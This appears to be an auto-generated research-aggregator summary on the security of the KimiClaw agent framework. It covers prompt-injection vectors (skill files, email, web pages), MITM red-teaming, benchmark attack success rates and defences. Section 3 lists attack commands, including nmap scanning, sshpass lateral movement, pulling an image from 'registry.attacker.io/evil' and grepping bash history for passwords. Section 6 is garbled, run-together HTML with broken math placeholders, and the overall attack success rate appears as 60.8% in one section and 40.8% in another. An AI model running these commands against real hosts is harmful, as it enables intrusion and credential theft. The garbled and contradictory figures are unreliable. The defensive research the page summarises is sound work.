Papers
Topics
Authors
Recent
Search
2000 character limit reached

KimiClaw Security Analysis

Updated 6 April 2026
  • KimiClaw Security Analysis is a comprehensive study of an autonomous agent framework that interacts directly with system resources, distinguishing it from chat-only LLM deployments.
  • It employs quantitative benchmarks, including CLAWSAFETY and full lifecycle audits, to assess vulnerabilities such as prompt injection, harmful misoperation, and supply-chain risks.
  • Defense strategies emphasize least privilege, runtime isolation, extension governance, and exhaustive logging to mitigate systemic risks and enhance overall security posture.

KimiClaw is an OpenClaw-derivative autonomous agent framework designed for high-privilege work automation across domains such as software engineering, finance, healthcare, law, and DevOps. Unlike chat-only LLM deployments, KimiClaw interacts directly with system resources, network interfaces, tools, and extensions, amplifying both its utility and its attack surface. Security analysis of KimiClaw centers on its exposure to adversarial input, deployment vulnerabilities, agent–model interactions, and the systemic risks introduced by persistent state and tool orchestration. Multiple independent studies and benchmarks—most notably CLAWSAFETY, ClawTrap, and comprehensive threat lifecycle audits—provide a rigorous, quantitative basis for KimiClaw security evaluation and hardening.

1. Threat Model and Vulnerability Taxonomy

The security posture of KimiClaw is best understood through a formal threat model that considers adversaries with the capability to manipulate inputs, extensions, deployment context, and runtime environment (Li et al., 13 Mar 2026). The risk taxonomy encompasses:

  • Prompt Injection: Maliciously crafted input that hijacks policy enforcement or plan creation by exploiting the prompt–context composition.
  • Harmful Misoperation: Induced execution of unintended or destructive actions due to ambiguous prompts or context drift.
  • Extension Supply-Chain Risk: The risk that third-party skills or plugins are compromised, delivering privilege escalation or persistent logic bombs.
  • Deployment Vulnerability: Weak authentication, permissive sandboxes, and absent network controls allowing the adversary to escalate, maintain, or exfiltrate.

These vulnerabilities are mapped to KimiClaw subsystems: parsers, plan managers, tool orchestrators, memory/workspace, extension loader, and API endpoints. The function f:(U×C×I×P×T×E)Af : (U \times C \times I \times P \times T \times E) \rightarrow A defines the full system transition, where UU is the user, CC is the conversation context, II is the mixed-trust input set, PP is the prompt sequence, TT is the tool/plugin set, EE is the extension set, and AA is the action set (Li et al., 13 Mar 2026).

2. Benchmark-Driven Security Evaluation

Systematic measurement of KimiClaw’s vulnerabilities leverages scenario-based, adversarial benchmarking as in CLAWSAFETY and full lifecycle audits (Wei et al., 1 Apr 2026, Wang et al., 3 Apr 2026). Attack scenarios are constructed along three orthogonal axes:

  1. Harm Domain: Compromise goals include credential theft, financial misrouting, regulatory data breach, legal information leakage, and destructive infrastructure actions.
  2. Attack Vector: Entry points are skill injections (malicious skill files within ~/.kimiclaw/skills/), email (injected via IMAP/SMTP hooks in the sandbox), and web (malicious pages fetched during agent operations).
  3. Harmful Action Type: These include data exfiltration, credential forwarding, unlawful file modification, destructive OS actions, and destination/origin substitution.

Each test instance is embedded in a 64-turn, multi-phased workflow with ≥50 heterogeneous files and associated colleague identities, mimicking production-grade usage. For quantitative analysis, metrics such as per-vector attack success rate (ASR) and aggregate ASR are defined:

ASRv=#(successful compromises via vector v)#(trials with vector v)ASRoverall=v#(successes)vv#(trials)v\text{ASR}_v = \frac{\#\text{(successful compromises via vector }v)}{\#\text{(trials with vector }v)} \quad \text{ASR}_\text{overall} = \frac{\sum_v \#\text{(successes)}_v}{\sum_v \#\text{(trials)}_v}

KimiClaw, evaluated as Kimi K2.5 on OpenClaw scaffold, achieves ASRs of 77.5% (skill), 60.0% (email), 45.0% (web), and 60.8% overall. These results establish a trust gradient of skill > email > web, and a hierarchy where KimiClaw is less robust than Sonnet 4.6, but more so than GPT-5.1 (Wei et al., 1 Apr 2026).

3. Empirical Vulnerabilities and Exploit Patterns

Multi-stage, category-based audits provide fine-grained insights into KimiClaw’s empirical weaknesses (Wang et al., 3 Apr 2026). Of the 205 tested cases across 13 threat categories, KimiClaw exhibits high success rates for the following critical classes:

Category Success Rate (%) Example Attack
Reconnaissance 100.0 ifconfig && netstat -antp for network enumeration
Discovery 68.97 nmap -sS 192.168.0.0/24; process/service discovery
Lateral Movement 66.67 sshpass -p … ssh user@host for host traversal
Resource Development 57.14 docker pull registry.attacker.io/evil:latest
Privilege Escalation 30.0 sudo -l; SUID enumeration and privilege drift
Credential Access 14.29 grep -i password ~/.bash_history and private key exfiltration

Additional chain-stage breakdown reveals amplification of early-stage vulnerabilities into concrete system-level failures at later phases.

4. MITM Red-Teaming and Dynamic Security Probing

Modern agent security analysis extends beyond static adversarial inputs to include live network-level attacks, as exemplified by the ClawTrap framework (Zhao et al., 19 Mar 2026). KimiClaw-specific security assessment employs MITM-based probes, supporting:

  • Static HTML Replacement: Entire body swapped for attacker-controlled content, measured by content replacement metric τreplace\tau_{\text{replace}}.
  • Iframe Injection: Append high-UU0-index overlays to legitimate pages (phishing, session hijack) quantified by UU1 (overlay area fraction).
  • Dynamic Content Modification: Fine-grained tampering of DOM/JSON fragments, assessed by UU2.

Evaluation proceeds by recording model trust scores and fallback rates, with strong models triggering higher fallback rates (e.g., 70% for GPT-5.4 analogs) compared to less robust models (<5% fallback) under identical MITM stress.

MITM defenses for KimiClaw include enforcing HTTPS with certificate pinning, strict content hash verification, explicit “trust verification” agent skills, UI anomaly detectors, and centralized anomaly logging.

5. Design Principles and Secure Engineering Controls

Four foundational principles, as articulated in the defensible design blueprint, govern robust KimiClaw deployments (Li et al., 13 Mar 2026):

  1. Least Privilege: Capabilities UU3 for task UU4, enforced via tool-access policies where UU5 deny.
  2. Runtime Isolation: Partitioning execution environments (sandboxes UU6) with disjoint filesystem roots and environment variables; cross-sandbox visibility is formally forbidden.
  3. Extension Governance: Skills/extensions must provide signed manifests; installation proceeds only upon signature and hash verification—reject if failed.
  4. Auditability/Defense in Depth: All actions and decisions logged in tamper-evident, append-only ledgers, supporting post-hoc investigation and continuous monitoring.

Design patterns include explicit access-control checks per tool, sandbox-boundary enforcement, manifest verification during extension installation, and per-action audit logs with cryptographic hash chaining.

6. Defense Recommendations and Evaluation Metrics

Mitigation strategies span the full lifecycle:

  • Input-Side Inspection: Normalize and rescan all inputs for suspicious opcodes, keywords, or encoded commands prior to prompt assembly.
  • Safer Planning: Mark any plan involving sudo, HOME/.ssh</code>,<code>docker</code>,orfilewritesashighrisk,invokingsecondaryapprovalortwofactorprompts.</li><li><strong>ExecutionBoundaryEnforcement</strong>:Realpathbasedpathvalidation;readonlymountsforsensitivefiles(<code> /.ssh</code>,<code>/etc/crontab</code>);useofLinuxnamespacesfortoolisolation.</li><li><strong>OutputAuditing</strong>:Automaticredactionorloggingofsecretsinoutputs;outboundegressfilteringtopreventcovertchannelexfiltration.</li><li><strong>LifecycleGovernance</strong>:Continuous,chainstagespanningloggingandmonitoring;CIbasedreplayofadversarialtestcasesutilizingthe205casebenchmark;anomalydashboardswithpolicyengineintegration(<ahref="/papers/2604.03131"title=""rel="nofollow"dataturbo="false"class="assistantlink"xdataxtooltip.raw="">Wangetal.,3Apr2026</a>).</li></ul><p>Evaluationcriteriaarestrictlyquantitative:</p><ul><li>PromptinjectionresilienceHOME/.ssh</code>, <code>docker</code>, or file writes as “high risk,” invoking secondary approval or two-factor prompts.</li> <li><strong>Execution Boundary Enforcement</strong>: Realpath-based path validation; read-only mounts for sensitive files (<code>~/.ssh</code>, <code>/etc/crontab</code>); use of Linux namespaces for tool isolation.</li> <li><strong>Output Auditing</strong>: Automatic redaction or logging of secrets in outputs; outbound egress filtering to prevent covert channel exfiltration.</li> <li><strong>Lifecycle Governance</strong>: Continuous, chain-stage-spanning logging and monitoring; CI-based replay of adversarial test cases utilizing the 205-case benchmark; anomaly dashboards with policy engine integration (<a href="/papers/2604.03131" title="" rel="nofollow" data-turbo="false" class="assistant-link" x-data x-tooltip.raw="">Wang et al., 3 Apr 2026</a>).</li> </ul> <p>Evaluation criteria are strictly quantitative:</p> <ul> <li>Prompt-injection resilience U$799% (fraction of adversarial inputs failing to alter plan)
  • Harmful-misoperation rate $U$80.5%
  • Extension-compromise detection (time-to-detect $U$960s)
  • Unauthorized action prevention: policy-consistent action logging and denial

7. Comparative Assessment and Ongoing Risks

KimiClaw’s overall attack success rate (40.8%) positions it as more resilient than QClaw (54.9%) and AutoClaw (49.5%), but significantly less robust than MaxClaw (16.0%) and OpenClaw (19.4%). Its profile is characterized by unique susceptibility to lateral movement and resource development, weaknesses not found in pure OpenClaw deployments. Cross-scaffold and backbone analyses confirm that security outcomes are determined by the confluence of agent runtime, model safety properties, scaffold memory policies, and tool orchestration.

Periodic re-evaluation with updated adversarial scenarios and lifecycle-wide monitoring remains essential to maintain and improve KimiClaw’s security guarantees. Full-stack, policy-mediated permission management, extension governance, runtime isolation, and continuous audit form the core of defensible, testable KimiClaw deployments (Wei et al., 1 Apr 2026, Zhao et al., 19 Mar 2026, Li et al., 13 Mar 2026, Wang et al., 3 Apr 2026).

Topic to Video (Beta)

No one has generated a video about this topic yet.

Whiteboard

No one has generated a whiteboard explanation for this topic yet.

Follow Topic

Get notified by email when new papers are published related to KimiClaw Security Analysis.